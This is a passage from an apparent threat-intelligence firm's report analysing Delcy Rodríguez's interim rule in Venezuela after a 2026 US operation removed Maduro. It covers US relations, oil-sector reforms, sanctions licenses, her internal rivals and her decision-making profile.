        <p>The first clarity on Venezuela’s future leadership came from Washington. At roughly 11:50 EST (12:50 VET), US President Donald Trump gave a public address in which he explicitly <a href="https://www.youtube.com/watch?v=SsdkClL2_bg">stated</a> that Washington would work with Rodríguez as it assumed a more direct role in overseeing the country’s energy and security policies. Trump also said that María Corina Machado, the most popular opposition figure in the country (who had been outside the country since December 2025 and is currently in Washington) did not “have the support within or the respect within the country” to rule. While Trump claimed that Rodríguez had been "sworn in," Rodríguez’s hold on power was not publicly ratified until 15:20 VET. At that time, state television <a href="https://www.youtube.com/watch?v=p4V7Qiu7NrQ">aired</a> footage of the Council of National Defense, a body made up of the main institutional leaders of the country, featuring Rodríguez chairing the meeting and Cabello, López, and National Assembly President Jorge Rodríguez (Delcy Rodríguez’s brother) present. It was not until roughly 22:00 VET that state media began circulating a <a href="https://historico.tsj.gob.ve/decisiones/scon/enero/352131-0001-3126-2026-26-0001.HTML">decision</a> from the Constitutional Chamber of the Venezuelan Supreme Tribunal of Justice (TSJ) that made clear that Rodríguez would assume the duties of the president. In its ruling, the TSJ invoked a Chávez-era precedent to overrule constitutional language that would otherwise require her to schedule an early election, effectively indicating that Rodríguez is very likely seeking a mandate until Maduro’s term ends in January 2031. Neither Rodríguez nor any other official has yet made this claim explicit, and US officials have <a href="https://www.politico.com/news/2026/02/06/white-house-frustrations-with-venezuelas-machado-surface-after-election-comments-00770005">suggested</a> that new elections should be held before then. On January 5, she was officially sworn into office in a televised ceremony held in the National Assembly in the presence of key figures in the regime and diplomats from China, Iran, Russia, and Cuba.</p>
        <h2>US-Venezuela Relations Since January 3</h2>
        <p>Since January 3, the US has generally signaled support for a working relationship with Delcy Rodríguez, while making clear that Washington expects full cooperation with its energy and security priorities. In the immediate aftermath of the operation, President Trump told reporters that he might <a href="https://www.reuters.com/world/us/venezuelas-maduro-custody-trump-says-us-will-run-country-2026-01-04">consider</a> a second strike if Rodríguez did not cooperate, but then, on January 9, <a href="https://truthsocial.com/@realDonaldTrump/posts/115864395969123502">announced</a> on Truth Social that he had “cancelled the previously expected second Wave of Attacks” in response to the Venezuelan government releasing a number of political prisoners. Since this announcement, Trump has <a href="https://www.reuters.com/world/americas/trump-venezuelan-leader-Rodr%C3%ADguez-tout-positive-phone-call-2026-01-14/">sought</a> to convey that he and Rodríguez work closely together. On March 5, 2026, Trump <a href="https://truthsocial.com/@realDonaldTrump/posts/116172714486213504">posted</a> on social media that Rodríguez is “doing a great job, and working with US Representatives very well.”</p>
        <p>US Secretary of State Marco Rubio has also expressed a willingness to work with Rodríguez’s interim government, but provided more explicit emphasis on a transition as the ultimate end goal of US policy. Speaking to reporters on January 7, Rubio <a href="https://www.reuters.com/world/us/rubio-says-us-plan-venezuela-is-stability-recovery-then-transition-2026-01-07/">described</a> the US approach as consisting of three main phases: stabilization, recovery, and transition. Stabilization, he stated, is needed to prevent Venezuela from “descending into chaos,” which would be avoided by US control over oil-sale proceeds. Rubio clarified that the “recovery” phase would be aimed at reopening the oil sector to US and other Western firms, and it would ultimately be followed by a “process of transition” that would include reconciliation among Venezuelans. This three-phase framing has been echoed by other US officials, although to date, no fixed timeframe for a transition has been made public. US officials have also <a href="https://www.nytimes.com/2026/01/16/us/politics/cia-director-ratcliffe-venezuela.html">said</a> that severing Venezuela’s ties to Russia, China, Cuba, and other US geopolitical adversaries is a top priority in the relationship.</p>
        <p>US-Venezuela coordination on energy policy appears to be advancing rapidly. On January 29, Venezuela’s PSUV-controlled National Assembly <a href="https://www.asambleanacional.gob.ve/noticias/an-sanciona-reforma-de-ley-organica-de-hidrocarburos">passed</a> a reform to the country’s Organic Hydrocarbons Law, aimed at increasing autonomy for private companies involved in the country’s oil and gas industry. While the revised law continues to assert state ownership over hydrocarbon reserves, it broadens the mechanisms through which private companies can participate in upstream activity, including allowing private operators — via contracts with state-owned energy company Petróleos de Venezuela S.A. (PDVSA) or joint ventures — to assume operational control while retaining a share of production. The reform also introduces a much more flexible framework for royalties and taxes, which can be set on a case-by-case basis by the Ministry of Energy, with royalties of up to 30% and taxes of up to 15%. Previous windfall taxes have been eliminated in this reform.</p>
        <p>US support for revitalized energy cooperation with Venezuela has been enthusiastic, and President Trump has actively <a href="https://www.youtube.com/watch?v=l6u3H4hKgjA">encouraged</a> US and other Western oil companies to invest as much as $100 billion in Venezuela. Two days after the passage of the Organic Hydrocarbons Law reforms, the US <a href="https://www.cnn.com/2026/01/31/politics/us-envoy-venezuela-arrival">sent</a> Chargé d’Affaires Laura Dogu, who leads the Venezuela Affairs Unit out of the US Embassy in Colombia, to Caracas, where she is tasked with overseeing the restoration of diplomatic ties with Venezuela. While Dogu has conveyed US support for closer relations, she has reiterated US support for an eventual transition. On February 2, she met with Rodríguez, and afterward <a href="https://x.com/usembassyve/status/2018460485709095330">posted</a> on X that in the meeting she reiterated “the three phases that Secretary Rubio has outlined for Venezuela: stabilization, economic recovery and reconciliation, and transition.”</p>
        <p>In the wake of the Organic Hydrocarbons Law reform, the US Treasury Department’s Office of Foreign Assets Control (OFAC) <a href="https://ofac.treasury.gov/sanctions-programs-and-country-information/venezuela-related-sanctions">issued</a> a series of general licenses allowing US and other Western companies to produce, refine, transport, and sell oil without seeking individual exemptions, effectively lifting sanctions that had previously restricted these activities (see <strong>Appendix A</strong>). These OFAC licenses mandate that any authorized transactions with Venezuela's government or state energy company PDVSA must follow US laws (with disputes being resolved in the US), and that payments to the Venezuelan government or any other Venezuelan sanctioned entity be made into a US-overseen fund. US support for energy investment in Venezuela was emphasized from February 11 to 12, when US Energy Secretary Chris Wright led a delegation to Caracas to meet with Rodríguez, becoming the highest-ranking US official to visit Venezuela in years.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ad1dc22918718a39396ba9124959a30421f70065.png?width=750&amp;format=png&amp;optimize=medium" width="1170" height="728" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>US Energy Secretary Chris Wright examining crude oil at a PDVSA project site with Rodríguez (Source:</em> <em><a href="https://x.com/SecretaryWright/status/2022781983118500275/photo/1">Social Media</a>)</em></div>
          </div>
        </div>
        <h2>Internal and External Threats Confronting Acting President Rodríguez</h2>
        <p>Since Acting President Rodríguez took over from Maduro in the immediate aftermath of the US operation on January 3, she has voiced support for cooperation with Washington — but her incentives to cooperate fully are very likely limited. Rodríguez is aware of Washington’s “three point plan” for Venezuela and is likely supportive of US plans to stabilize the country, lift sanctions, and promote investment. However, she is almost certainly seeking to preserve her rule and a government led by the PSUV, and will very likely resist any attempt to preside over a transition of power to an opposition-led government. Her ability to do so will very likely depend on her ability to consolidate power and manage potential spoilers within her own coalition, as well as her ability to deepen cooperation with US interests and demonstrate utility to the White House. In doing so, she faces a number of internal and external threats to her rule, which include challenges by rivals inside the ruling PSUV over the next six to twelve months, and pressure by Washington to hold new elections over the next twelve to twenty-four months.</p>
        <h3>Internal Threats to Rodríguez’s Rule</h3>
        <p>The main internal threat to Rodríguez’s power in the short term is other members of the ruling elite. She has steadily worked to consolidate power and secure the support of the military and intelligence services, but her support among the country’s political and economic sectors is far from settled. There are almost certainly key figures in the security forces, the business community, and in the ruling party who view Rodríguez, and her relationship with the US, as a challenge to the previous status quo and its associated privileges, economic arrangements, and patronage schemes. They may be concerned about their future influence, immunity</p>
        <p>As Rodríguez continues to establish her rule, some of these individuals may seek to oppose her, either by seeking to derail or sabotage her rapprochement with Washington or by openly rebelling against her. In this context, an attempted palace coup cannot be ruled out. Her primary rivals include the following figures and networks, each of whom has a distinct power base and incentive to view Rodríguez as an adversary or rival:</p>
        <ul>
          <li><strong>Diosdado Cabello, Minister of Interior, Justice and Peace.</strong> Cabello is a senior power broker within the ruling party and has been the PSUV’s Secretary General since 2011. He has deep <a href="https://insightcrime.org/es/noticias/papel-colectivos-lucha-poder-venezuela-salida-maduro/">connections</a> to the security services and hardline enforcement networks, including to pro-government armed paramilitary organizations known as “colectivos” (see <strong>Figure 3</strong>). State media has <a href="https://www.elfinanciero.com.mx/mundo/2026/01/28/el-chavismo-se-cuadra-vladimir-padrino-y-diosdado-cabello-juran-lealtad-a-delcy-rodriguez/">sought</a> to downplay reported tensions between Cabello and Rodríguez, but Cabello’s incentives to undermine her are straightforward: Her consolidation of power threatens his influence over the party, the security apparatus, and his networks. He is also the only current cabinet member who was <a href="https://www.justice.gov/opa/media/1422326/dl">named</a> in the unsealed drug trafficking indictment US prosecutors issued to capture Maduro, and he likely suspects that Rodríguez may eventually hand him over to the US.</li>
          <li><strong>General Vladimir Padrino López, former Minister of Defense</strong>. Padrino López’s likely core incentive is to preserve the influence he accumulated after over a decade as the institutional head of the FANB, and to preserve the patronage networks he developed as the country’s longest-serving defense minister. He also likely seeks to protect himself and senior officers loyal to him from eventual prosecution for corrupt activities or involvement in repression, and therefore very likely views Rodríguez’s government as a challenge to longstanding FANB impunity. While there is no public evidence of any cracks between Padrino López and Rodríguez, it is very likely that he will resist meaningful reforms inside the armed forces.</li>
          <li><strong>Major General Alexis Rodríguez Cabello, Director of the Servicio Bolivariano de Inteligencia Nacional (SEBIN)</strong>. Cabello is a cousin of Diosdado Cabello and is believed to be close to him. As head of the primary intelligence service, Rodríguez Cabello has strong incentives to resist reforms that would expose him or his network to prosecution, and to preempt any purge that might impact him or his network.</li>
          <li><strong>Major General Iván Rafael Hernández Dala, former director of the General Directorate of Military Counterintelligence (DGCIM)</strong>. Hernández Dala, a close confidant of Maduro, was head of DGCIM until replaced by Rodríguez in January 2026. He is also believed to be a longstanding opponent of both Rodríguez and Cabello, and of their respective factions in the PSUV. Even if sidelined from formal command, Hernández Dala likely retains networks inside the intelligence and security apparatus. He likely has incentives to undermine Rodríguez if he anticipates facing prosecution for past abuses, loss of status, or exclusion from any protection or economic deals between Washington and Caracas.</li>
          <li><strong>Business and Political Elites Tied to Maduro</strong>. Maduro and Flores dominated Venezuelan politics for nearly thirteen years. During that time, they cultivated a vast network of well-connected economic, military, and political elites that helped them sustain power. Many of them are not overtly tied to the Rodríguez siblings, and instead may be willing to ally themselves with rival factions to advance their own interests. Possible figures in this category include:
            <ul>
              <li><strong>Tarek William Saab, Acting Ombudsman</strong>. Until his resignation in February 2026, Saab served as attorney general since 2017 and held significant influence over how the repressive apparatus was deployed, overseeing detentions and prisoner releases. Saab’s resignation was very likely forced, and he has clear incentives to resist any reform process that reduces his discretion or creates a credible path to independent investigations into past repression or corruption.</li>
              <li><strong>Nicolas Maduro Guerra, also known as “Nicolasito.”</strong> A member of the National Assembly and son of Maduro and Flores, Maduro Guerra is not one of the top PSUV powerbrokers in his own right but has played a crucial role in securing continuity by appearing publicly with Rodríguez and <a href="https://cnnespanol.cnn.com/2026/02/12/venezuela/hijo-maduro-padre-pasos-correctos-unidad-orix">claiming</a> she has his parents’ full support. Given lingering questions over internal Chavista involvement in the January 3 operation, he has leverage to complicate Rodríguez’s narrative and may seek to use it if he feels that his interests are threatened by the Rodríguez administration.</li>
              <li><strong>Alex Saab</strong>. Saab <a href="https://ofac.treasury.gov/media/43236/download?inline">played</a> a crucial role in facilitating sanctions evasion networks until his arrest by US law enforcement in 2020. Saab was later returned to Venezuela in a 2023 prisoner swap, and Maduro rewarded him by making him Minister of Industry and National Production. Rodríguez replaced him in January 2026, likely understanding that Saab was not palatable for US business interests, but Saab likely retains enough social capital within Venezuela’s private sector to pose a challenge to Rodríguez. This is the likely reason why Saab was reportedly <a href="https://www.nytimes.com/2026/02/04/world/americas/venezuela-said-to-detain-maduro-allies-targeted-by-the-us.html">detained</a> by Venezuelan intelligence in February 2026, although his lawyer has maintained that he is not under arrest.</li>
            </ul>
          </li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_16b6465db49374e12b6530f2c980c6d73129cc6b8.png?width=750&amp;format=png&amp;optimize=medium" width="1542" height="1600" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Illustration of key internal rivals of Venezuelan Acting President Delcy Rodríguez (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>External Threats to Rodríguez’s Rule</h2>
        <h3>US Pressure to Box Out Geopolitical Adversaries</h3>
        <p>In the short term, the most significant external threat that Rodríguez faces is a reversal of United States policy — either via renewed military or intelligence operations intended to force her removal, or through a more indirect pressure campaign meant to trigger a domestic fracture. A second US special forces operation to depose her outright is unlikely, but it remains a scenario Rodríguez and her circle will have to treat seriously, given the direct and disproportionate leverage that Washington currently holds over Caracas. More likely than further military action is the prospect of renewed pressure: the US can calibrate sanctions relief, revoke OFAC licenses, and facilitate or block diplomatic recognition in ways that shape incentives and perceptions of the regime’s survivability among Venezuelan elites. Recent reporting <a href="https://www.reuters.com/world/china/us-intelligence-raises-doubts-about-venezuela-leaders-cooperation-2026-01-28/">suggests</a> Washington is simultaneously pursuing deepened energy engagement while remaining skeptical about whether Rodríguez will fully align with US strategic demands, which increases the possibility of an abrupt shift away from Rodríguez if she does not deliver on US priorities.</p>
        <p>A major fault line in the US-Venezuela relationship is Venezuela’s ongoing relationships with US geopolitical adversaries, namely China, Russia, Iran, and Cuba, even as the US has increasingly sought to box them out of Venezuela. US officials publicly <a href="https://www.cbsnews.com/news/marco-rubio-secretary-of-state-face-the-nation-transcript-01-04-2026/">demanded</a> that Venezuela cut ties with adversary nations and have actively moved to push them out. The US has successfully pressured Venezuela to end fuel shipments to Cuba, and OFAC general licenses intended to facilitate Venezuelan oil and gas activity explicitly do not authorize transactions involving Russian, Chinese, or Iranian entities. In spite of this, Rodríguez has sought to publicly <a href="https://en.mehrnews.com/news/240521/Venezuela-interim-pres-receives-Iran-China-Russia-envoys">demonstrate</a> an interest in retaining these partnerships.</p>
        <h3>Opposition Efforts to Limit US-Venezuela Engagement</h3>
        <p>Another short-term external threat to Rodríguez is opposition figure María Corina Machado. While she remains the most popular opposition figure in Venezuela, and her faction has a <a href="https://www.bbc.com/news/articles/cyv3vlz01g3o">demonstrated</a> capacity to organize protests on the ground, these have so far not presented a significant threat to stability or to PSUV governance. Her presence in Washington since December 2025, however, has provided her with a major platform to directly shape the US foreign policy debate over Venezuela. With Machado and close advisors operating from Washington, she has <a href="https://www.politico.com/news/2026/02/06/white-house-frustrations-with-venezuelas-machado-surface-after-election-comments-00770005">advanced</a> a narrative publicly supportive of the US agenda while privately calling on allies in Congress and in the international community to <a href="https://www.nytimes.com/2026/01/20/us/politics/house-foreign-affairs-machado-venezuela.html">press</a> for a clearer timetable for new elections and the ouster of the PSUV. She has also used her platform to <a href="https://www.nbcnews.com/world/latin-america/corina-macado-returning-venezuela-opposition-rcna261278">promise</a> she will return soon, and to highlight perceived inconsistencies between Rodríguez’s actions and her rhetoric, noting, for instance, the gap between the government’s claimed political prisoner release numbers and the figures cited by independent rights organizations.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c851bb0a0865849d18243e4144cefc596663c07a.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Photo of Venezuelan opposition leader María Corina Machado at a rally ahead of the 2024 presidential election (Source:</em> <em><a href="https://www.reuters.com/world/americas/venezuelas-nobel-prize-winner-bets-big-trump-pressure-builds-maduro-2025-10-28/">Reuters</a>)</em></div>
          </div>
        </div>
        <p>Machado has received <a href="https://www.foreign.senate.gov/press/dem/release/ranking-member-shaheen-senators-curtis-durbin-cruz-kaine-and-scott-bipartisan-statement-on-venezuela">strong support</a> from bipartisan lawmakers in the US House and Senate, who have questioned US engagement with Rodríguez. While Machado’s efforts to raise the political cost of engagement with the Rodríguez government have earned her support from some allies in Washington, the White House has reportedly <a href="https://www.politico.com/news/2026/02/06/white-house-frustrations-with-venezuelas-machado-surface-after-election-comments-00770005">expressed</a> frustration with her criticism, with officials claiming it undermines US policy. These efforts very likely represent a lesser threat to Rodríguez’s hold on power, given White House insistence on working with Rodríguez, but introduce persistent uncertainty into the sustainability of US support for her.</p>
        <h3>Calls for a Competitive Election</h3>
        <p>Beyond these immediate pressures, the most important mid-term threat to Rodríguez and to future PSUV rule is the election timeline reportedly being promoted by the Trump administration. While the US has refrained from presenting a specific timetable, officials ranging from Chargé d’Affaires Dogu to Secretaries Rubio and Wright have increasingly <a href="https://www.wsj.com/world/americas/venezuelas-new-leader-is-trying-to-run-out-the-clock-on-trump-f5564b52?mod=hp_listb_pos2">signaled</a> publicly that the US expects to see new elections in the next eighteen to twenty-four months. The specifics of these elections, like whether they would be only presidential or include broader general elections (to replace the PSUV-dominated National Assembly), have not been disclosed, but the US insistence on elections in some form very likely forces Rodríguez to reconcile her approach to coalition management with a desire to seek electoral legitimacy on a compressed timeline.</p>
        <p>At the moment, Rodríguez, her inner circle, and PSUV elites almost certainly view a competitive presidential election as an existential threat. Polls have repeatedly demonstrated that the PSUV is unpopular. While Rodríguez is the most popular figure in the PSUV, she would very likely lose a presidential race with Machado by a two-to-one margin, and Machado would very likely defeat any PSUV candidate absent a significant shift in public opinion. Maduro’s removal has not automatically revived grassroots loyalty to the ruling party, with local PSUV leaders <a href="https://www.reuters.com/world/americas/distrust-desertions-dwindling-bonuses-undermine-socialist-partys-grip-venezuela-2026-02-08/">describing</a> fractures, demobilization, and severe drops in participation inside local party structures since January 2026.</p>
        <p>Given the PSUV’s lack of legitimacy, US support for elections will likely become a flash point in the relationship with Rodríguez. These tensions will also very likely be exacerbated by opposition mobilization inside the country and Machado’s efforts to marshal support in Washington. While US authorities have not yet demanded that Machado be allowed to return to Venezuela (and have reportedly <a href="https://www.nytimes.com/2026/03/12/world/americas/trump-maria-corina-machado-venezuela.html">asked</a> her to delay any plans to this effect), her return is almost certain to occur well in advance of an election, as she has openly said she will run. The temporary <a href="https://www.cnn.com/2026/02/08/americas/venezuela-political-prisoners-opposition-released-latam-intl">re-arrest</a> of opposition figure Juan Pablo Guanipa in February after he began organizing anti-government rallies suggests the ruling party will likely seek to use the repressive apparatus to restrict Machado’s campaigning efforts, elevating the likelihood of pre-election instability. Even if a competitive election is held under the PSUV, the experience of the July 2024 election <a href="https://www.cartercenter.org/publication/final-report-observation-of-the-2024-presidential-election-in-venezuela/">suggests</a> that the ruling party is unlikely to recognize the results if the opposition wins, raising the likelihood of post-election instability, protests, and violence.</p>
        <h2>Delcy Rodríguez’s Origins and Principles of Her Approach to Decisionmaking</h2>
        <p>Before her emergence in recent years as the face of relative economic pragmatism in Chavismo, Delcy Rodríguez’s background was not well-known internationally. But her rise to power reveals a number of factors that likely inform her approach to governance and likely impact the prospect for political and economic stability moving forward. These include:</p>
        <ul>
          <li><strong>Familiarity with Venezuela’s Intelligence and Repressive Apparatus</strong>: In addition to her reputation as an economic reformer, Rodríguez likely has a deep familiarity with intelligence work that, according to state media, goes back to the Chávez years. In 2002-2003, she <a href="https://presidencia.gob.ve/Site/Web/Principal/paginas/classMostrarEvento3.php?id_evento=26747">reportedly</a> worked with the SEBIN’s predecessor agency, the Dirección General Sectorial de los Servicios de Inteligencia y Prevención (DISIP), on undisclosed counterintelligence work involving “geopolitical reports” with former DISIP head Eliezer Otaiza. From the time she rose to the office of Executive Vice President in 2018 until 2021, the SEBIN technically fell under her office. While there is no publicly available evidence that she explicitly directed SEBIN-led repression of dissidents, her role likely afforded her a deep familiarity with the main Venezuelan intelligence agency’s response during the government’s crackdown on the post-2018 election protests and the 2019 protest wave led by opposition figure Juan Guaidó. It is likely that she was, at a minimum, aware of acts of torture, extrajudicial executions, arbitrary detentions, and other alleged human rights violations and crimes against humanity since 2014 that have been <a href="https://www.ohchr.org/en/hr-bodies/hrc/ffmv/index">credibly documented</a> by the Independent International Fact-Finding Mission on Venezuela created by the United Nations (UN) Human Rights Council.</li>
          <li><strong>Identity Shaped by Revolutionary Politics</strong>: Rodríguez was born in Caracas in 1969 and grew up in a politically active left-wing family. Her father, Jorge Antonio Rodríguez, <a href="https://elestimulo.com/de-interes/2022-07-07/carlos-lanz-la-faln-y-los-secuestros-de-las-hijas-de-renny-ottolina-y-de-niehous/">founded</a> an armed urban guerrilla group and was killed in police custody in 1976, allegedly under interrogation. His death made him a martyr among the Venezuelan left, which cemented the revolutionary identities of Rodríguez and her older brother Jorge from an early age. Rodríguez has <a href="https://diariovea.com.ve/asi-conto-delcy-rodriguez-su-experiencia-como-estudiante-de-derecho-su-vida-en-paris-y-el-significado-del-4-f/">framed</a> her decision to study law as an effort to “do justice for her father’s case,” and both she and her brother routinely cite his death as a justification for their support for Hugo Chávez and the movement he founded. In public, Rodríguez has repeatedly expressed strong support for the ruling party’s socialist ideology. In a September 2019 <a href="https://chicagoalbasolidarity.org/2019/10/01/english-text-of-venezuela-vice-president-delcy-rodriguez-speech-to-the-united-nations-general-assembly-september-27-2019/">address</a> to the United Nations General Assembly, she criticized “capitalist supremacism” and ended with a call to “save the world from capitalist violence.”</li>
          <li><strong>Willingness to Break from Ideological Purity</strong>: In practice, Rodríguez’s rise demonstrates that she is open to abandoning ideological purity in order to accomplish her objectives. Unlike Maduro and other ruling party figures who developed close personal ties to Chávez, she had a notoriously poor relationship with the former leader and spent significant time outside Venezuela in her formative years. Rodríguez <a href="https://open.spotify.com/episode/009i1LDavksXStl4lboqwf">studied</a> law at the Central University of Venezuela, but later pursued postgraduate studies abroad in labor law in London and Paris, and reportedly spent time in the United States. She <a href="https://www.washingtonpost.com/world/2026/01/09/venezuela-us-maduro-capture-vatican-russia">speaks</a> English and French. Rodríguez returned to Venezuela after the failed opposition-led coup attempt against Chávez in 2002, and first worked as an advisor in the Foreign Ministry, then as Deputy Minister for European Affairs, before ending up as Chávez’s Minister for Presidential Affairs. She did not last long in this position, however, and was abruptly dismissed after she <a href="https://talcualdigital.com/delcy-rodriguez-diplomacia-en-pie-de-guerra-perfil/">reportedly</a> argued with and insulted him during a presidential visit to Moscow. Rodríguez then adopted a lower profile in Venezuelan political life until Maduro took power and made her his foreign minister in 2014. As foreign minister (2014-2017), president of the pro-government National Constituent Assembly (2017-2018), and then as executive vice president (2018-2026), she <a href="https://www.reuters.com/article/world/cubas-new-leader-praises-maduro-in-solidarity-visit-to-venezuela-idUSKCN1IV1ZU/">developed</a> a reputation as a shrewd political operator and staunch Maduro ally.</li>
          <li><strong>Interest in Addressing PSUV’s Declining Popularity</strong>: Although Rodríguez was and arguably remains a Maduro ally, she has demonstrated a clear awareness of how the PSUV’s economic mismanagement has led to its declining popularity and has shown an interest in reversing it. Ahead of the 2018 presidential election, she briefly led a PSUV satellite party, the Movimiento Somos Venezuela (“We Are Venezuela Movement”), in a likely attempt to “rebrand” Chavismo and connect with a younger generation of Venezuelans. She was officially <a href="https://2001online.com/nacionales/delcy-rodriguez-vuelve-al-psuv-y-que-paso-con-somos-venezuela">reincorporated</a> into the PSUV’s leadership in late 2018 after her party failed to account for more than six percent of Maduro’s reelection vote. When Maduro made Rodríguez his Minister of Economy in 2020, she began to advance an agenda of relative economic liberalization, and <a href="https://www.bloomberg.com/news/articles/2021-03-09/venezuela-taps-former-ecuador-minister-as-financial-adviser">brought on</a> a team of Ecuadorean advisors to impose tighter fiscal discipline and stabilize the exchange rate, eventually <a href="https://www.reuters.com/article/markets/venezuela-dollarization-has-allowed-for-some-growth-in-commerce-group-says-idUSL1N2PJ1FL/">promoting</a> the de facto dollarization of the economy. The success of these policies contributed to a modest but important economic rebound and led Maduro to appoint her in 2024 as Energy Minister as well, a post she technically still occupies. In overseeing this economic agenda, she cultivated a reputation as less of an ideologue and more of a pragmatist, and began to pursue closer relationships with major energy companies and other investors. This reputation almost certainly contributed to the US decision to engage with her government after removing Maduro.</li>
          <li><strong>Calculating Operator with Sense of Persecution</strong>: Rodríguez has a history of keeping track of past instances where she has been slighted, even <a href="https://www.youtube.com/watch?v=NjZn6upVcCc">referring</a> to her support of Chavismo and of its revolution as her and her brother’s “personal revenge” for the death of their father. Rodríguez herself has alluded to this trait on state media. In a 2024 appearance on the <em>Con Maduro Podcast,</em> she recalled running into former Argentine President Mauricio Macri, a vocal critic of the Venezuelan government, at the 2022 World Cup in Qatar. Macri had recently been made the Executive Chairman of the FIFA Foundation, and, according to Rodríguez, she shook his hand and <a href="https://fidelernestovasquez.wordpress.com/wp-content/uploads/2024/02/boletin-del-psuv-nr-382-carpeta-fidel-ernesto-vasquez.pdf">told him</a>: “Did you see where you are now, and where we are? We're with the Venezuelan people. And you? You're here picking up balls.” Rodríguez is also a savvy operator, and her rise to prominence reflects not only her ability to deliver on economic policy objectives but also her ability to outmaneuver rivals. The best-known instance of this is her leadership of an anti-corruption campaign in 2024, which <a href="https://apnews.com/article/delcy-Rodr%C3%ADguez-maduro-trump-venezuela-e71f2289bc801446e05550d8f900a8d1">resulted</a> in the imprisonment of former vice president, oil minister, and longtime rival Tareck El Aissami.</li>
          <li><strong>Openness to Dialogue with Washington</strong>: Even before the current rapprochement between Washington and Caracas, Rodríguez was known for <a href="https://laverdaddevargas.com/delcy-Rodriguez-venezuela-esta-dispuesta-a-dialogar-con-eeuu/">consistently favoring</a> a deeper diplomatic relationship with Washington — albeit one built on mutual respect. During the 2022 phase of exploratory talks in which the two countries negotiated sanctions relief in exchange for holding presidential elections in 2024, Rodríguez publicly maintained that the relationship “cannot be conditioned,” <a href="https://www.aa.com.tr/es/mundo/vicepresidenta-de-venezuela-el-acercamiento-a-estados-unidos-no-fue-condicionado-/2532597">saying</a> that Venezuela’s doors were open to any country that arrived “with respect” and treated it as an equal under international law. During this period, she specifically centered the importance of discussing US oil and gas interests in bilateral diplomacy, saying that Venezuela was willing to pursue “energy dialogue” with US firms, <a href="https://www.mppef.gob.ve/dialogo-venezuela-eeuu-no-puede-estar-condicionado/">indicating</a> a view of energy cooperation as a channel for de-escalating tensions.</li>
        </ul>
        <h2>A Framework for Anticipating Delcy Rodríguez’s Policy Decisions</h2>
        <p>When Delcy Rodríguez faces policy decisions that impact economic and political stability in Venezuela in the coming months, her approach is likely informed by the pillars described above: her revolutionary identity, tactical pragmatism, openness to US engagement, an interest in restoring popular support for the PSUV, a long memory for slights, and familiarity with the security apparatus, as well as the internal and external short- and mid-term threats to her rule. Given these factors, Insikt Group assesses that she is very likely to prioritize near-term governability and economic stabilization over maximalist ideological positioning, while likely cooperating with the US in ways that preserve her credibility inside the ruling coalition. This matters for prospective investors because it suggests the Venezuelan government is likely to seek to maintain a pragmatic economic policy environment focused on short-term macroeconomic stability. At the same time, companies seeking to invest will almost certainly continue to face elevated sanctions compliance risks and potential policy reversals depending on the evolving Washington-Caracas relationship, making it critical to closely monitor Rodríguez’s evolving policy decisions and internal relationships.</p>
        <h3>Coalition Management over Open Confrontation with Rivals</h3>
        <p>Rodríguez will likely prioritize maintaining and reconfiguring her coalition over seeking conflict with internal rivals, because the external pressure she faces makes internal rupture more risky than compromise. Her main rival, Diosdado Cabello, has significant sway over the repressive apparatus and over pro-government armed “colectivos” loyal to him, and his removal could therefore provoke unrest and destabilizing violence. This is precisely the kind of chaos Washington has <a href="https://x.com/RapidResponse47/status/2012228403739418816">sought</a> to avoid, and very likely why it opted to keep Rodríguez in place as interim president in the first place. She therefore likely assesses that purging, detaining, or otherwise sidelining Cabello or other top PSUV rivals could risk calling into question her ability to maintain order, and would undermine her position with Washington as a lynchpin of relative calm and continuity.</p>
        <p>This is likely the reason that Rodríguez has sought to balance the ruling coalition since taking power rather than immediately shaping it to align with her preferences. Although she <a href="https://www.swissinfo.ch/spa/rodr%C3%ADguez-nombra-a-un-exjefe-del-banco-central-de-venezuela-como-vicepresidente-econ%C3%B3mico/90734912">elevated</a> her allies to higher positions in her government early in her tenure — such as appointing Calixto Ortega as Vice President of Economy — she has largely kept the ruling apparatus in place. Not only has she left a number of other figures close to Cabello in their positions, but she has also promoted figures in Cabello’s network. Just three days after Maduro’s capture, she <a href="https://www.eltiempo.com/mundo/venezuela/el-blindaje-de-delcy-Rodr%C3%ADguez-una-pieza-de-diosdado-cabello-asume-control-de-seguridad-presidencial-3522518">named</a> Gustavo González López, believed to be a Cabello ally, to lead both the Presidential Honor Guard and the Directorate General of Military Counterintelligence (DGCIM). On March 18, she also named González López to be her Defense Minister, replacing Padrino López. She also appointed Cabello’s daughter, Daniella Cabello, to be Minister of Tourism — a significant post that will afford her a direct role in reopening Venezuela to international commercial activity. These moves were likely taken out of a desire to effectively secure Cabello’s support for her economic normalization agenda.</p>
        <h3>Face-Saving Cooperation with Washington</h3>
        <p>Rodríguez will likely continue to cooperate with Washington’s energy priorities, but she will very likely pair this compliance with visible signaling aimed at saving face with PSUV loyalists. This is likely why, even as she has received high-level US officials in Caracas and even spoken with Trump over the phone, she has publicly demonstrated support for retaining partnerships with US adversaries. On January 8, for instance, Cuban Foreign Minister Bruno Rodríguez traveled to Caracas and accompanied the interim president to <a href="https://www.reutersconnect.com/item/ceremony-honouring-venezuelan-and-cuban-military-and-security-personnel-who-died-during-a-us-operation-to-capture-venezuelas-president-maduro-and-his-wife-in-caracas/dGFnOnJldXRlcnMuY29tLDIwMjY6bmV3c21sX1JDMjZYSUFJRURDNA">speak</a> at a commemoration event at Venezuela’s Military Academy for the Cuban and Venezuelan casualties from the January 3 US operation to capture Maduro. This was Rodríguez’s first event in which she officially presided over a military ceremony as commander in chief of the armed forces. On the same day, state-run media reported that Rodríguez held a meeting with Chinese Ambassador to Venezuela Lan Hu, in which she <a href="https://www.scmp.com/news/china/diplomacy/article/3339375/china-says-it-still-deeply-committed-venezuela-ambassador-meets-new-leader">thanked</a> China for its support for Venezuelan sovereignty and described the encounter as “cordial.” The ambassadors of China, Russia, and Iran were given <a href="https://www.telesurtv.net/delcy-Rodriguez-presidenta-encargada-venezuela">front row seats</a> to Rodríguez’s January 5 swearing-in ceremony, and state TV broadcast images of the Venezuelan leader 